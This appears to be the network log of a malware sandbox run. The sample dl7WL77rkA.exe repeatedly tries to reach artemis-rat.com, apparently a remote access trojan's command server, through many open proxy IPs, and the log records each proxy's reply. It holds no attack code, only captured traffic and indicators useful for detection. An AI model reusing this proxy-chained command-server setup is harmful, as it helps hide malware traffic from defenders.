                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.998688936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.999159098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.998856068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1250192.168.2.55276651.161.33.206445233876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.004473925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1251192.168.2.553368115.146.225.137100463876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.005147934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1252192.168.2.553366185.49.30.580813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.005398989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1253192.168.2.55336436.92.81.18141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.005708933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1254192.168.2.55340620.210.113.3281233876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.008781910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.273838043 CET319INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from cdn-fintech.info
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                                                                                                                                                                            Data Ascii: ERR_ACCESS_DENIED


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1255192.168.2.55336138.54.116.931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.010121107 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.434178114 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1256192.168.2.55341338.162.31.931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.011320114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.422396898 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1257192.168.2.553393212.110.188.202344093876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.011710882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.701946974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.064862967 CET39INHTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1258192.168.2.55337545.159.189.24431283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.012077093 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:32:48.187269926 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:48.843167067 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:49.757435083 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:51.583209038 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:55.239094019 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:33:02.551028967 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:33:17.176285028 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:33:46.455214977 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1259192.168.2.55340323.137.248.19788883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.012263060 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.307588100 CET | 309 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.18.0
Date: Mon, 11 Mar 2024 02:30:43 GMT
Content-Type: text/html
Content-Length: 157
Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1260192.168.2.552895153.139.233.21880803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.012689114 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.781260014 CET | 39 | IN | HTTP/1.0 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1261192.168.2.552827192.163.200.80373273876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.012697935 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.014522076 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1262192.168.2.552760187.49.191.739993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.013238907 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.046597004 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1263192.168.2.553358203.95.196.5080803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.019351006 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1264192.168.2.55280645.10.42.2031283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.020407915 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.201941967 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.208198071 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:55.405117035 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1265192.168.2.553465172.64.80.55803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.023361921 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.178081989 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:43 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1266192.168.2.55337814.232.235.1380803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:43.024480104 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.422102928 CET  72  IN  HTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1267192.168.2.55345338.54.101.25490003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:43.028495073 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.205440044 CET  39  IN  HTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1268192.168.2.553061117.160.250.16388283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:43.063868046 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.005883932 CET  221  IN  HTTP/1.1 403 Access Denied
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-store
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Content-Length: 43
                                                                                                                                                                                                                                                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                                                                                                                                                                            Data Ascii: You are not allowed to access the document.
Mar 11, 2024 03:30:48.863737106 CET  221  IN  HTTP/1.1 403 Access Denied
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-store
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Content-Length: 43
                                                                                                                                                                                                                                                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                                                                                                                                                                            Data Ascii: You are not allowed to access the document.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1269192.168.2.553463192.210.228.28156733876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:43.065331936 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1270192.168.2.55344768.183.143.134803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:43.071983099 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.885030985 CET  814  IN  HTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 622
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@copperalliance.us to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1271192.168.2.55346038.162.3.8231283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:43.076589108 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.495726109 CET  111  IN  HTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1272192.168.2.553412195.87.217.7533893876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:43.095287085 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1273192.168.2.552836104.251.212.206590573876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:43.099772930 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.201941967 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.208221912 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:55.405129910 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1274192.168.2.552769115.244.127.164803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.123959064 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1275192.168.2.553414171.247.244.10310803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.128776073 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1276192.168.2.553421200.10.73.21056783876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.133032084 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1277192.168.2.553416143.64.8.2180803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.144150019 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.680324078 CET | 59 | IN | HTTP/1.1 200 Connection Established
Proxy-agent: nginx


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1278192.168.2.552568117.160.250.138803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.203222990 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.266588926 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.405419111 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
